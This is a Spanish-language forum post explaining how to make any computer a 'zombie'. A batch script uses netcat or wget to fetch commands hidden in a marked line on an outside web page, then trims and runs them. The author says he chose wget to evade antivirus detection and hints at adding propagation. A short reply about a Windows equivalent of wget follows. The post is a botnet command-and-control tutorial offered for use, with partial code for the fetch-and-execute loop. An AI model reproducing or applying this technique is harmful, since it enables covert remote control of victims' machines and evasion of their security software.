Bueno me e animado a subir este pequeño manual para volver "zombi" cualquier ordenado y que ejecute nuestras ordenes lo que denominare (ya que no se su denominacion tecnica) una conexion indirecta ya que nosotros dejaremos la orden en un sitio y el zombi la recogera y ejecutara, aviso que todo lo hago con batch + wget , inicialmente lo codifique utilizando netcat pero para llamar menos la atencion de los AV lo recodifique con wget


Bueno basicamente es aprovechar cualquier campo fijo (pero actualizable) para poner nuestro comando, para poder aislar la linea que contiene nuestro comando deberemos añadir una cadena singular usease una cadena unica que no se repita en el codigo fuente de la pagina a la que llamaremos

Explicare la manera de hacerlo con Netcat tmb para quede completo XD!!

Si utilizamos netcat deveremos guardar la URL en una variable <<EXCLUIENDO los caracteres ( & ) importante!! >>

Si la URL seleccionada tuviera dichos caracteres separariamos la URL en diferentes variables





Esta URL se podria directamente en una variable

set "URL=http://webPortadora/campo/archivo.html"

Esta otra URL habria que separarla

Código:



Dejandola en tres variables

Código:

set "url1=http://webPortadora/index.php?id=1"
set "url2=u=10"
set "url3=z=3"

Una vez tenemos la url dentro de una variable realizamos la peticion de la pag y aislamos la linea que nos interesa utilizando la cadena singular, recordais ... Cheesy

echo GET %URL%| nc -vn IP(webportadora) 80 | find "CadenaSingular"
o
echo GET "%url1%&%url2%&%url3%" | nc -vn IP(webportadora) 80 | find "CadenaSingular"

Por precaucion contra lammers dire que este code deberia encerrarse dentro de un FOR /F  para poder meter el resultado de la salida del COMANDO en una variable

Como la linea de la pagina a la que llamamos aparte de nuestro codigo tmb tiene su propio codigo html tendremos que recortarle los extremos a la variable tal que asi

Código:

 

set resultado=%resultado:~X,-Y%

Donde (X) seria el cacho que quitamos al principio y (-Y) seria el cacho que le comeremos al final una vez que tenemos el comando en una variable ejecutarlo es una cosa trivial

Con WGET la cosa es casi iwal con la excepcion de que wget guarda el resultado en un archivo el cual llamamos con un FOR /F y guardamos el resultado de la salida en la variable, la recortamos y ya tenemos el comando
nuevamente listo para que lo ejecutemos.


Imaginad con un buen metodo de propagacion .......


Espero os haya servido de algo

Un saludo  

segun recuerdo en windows se puede usar un comando que realiza una funcion parecida a la de wget....pero ahora no recuerdo cual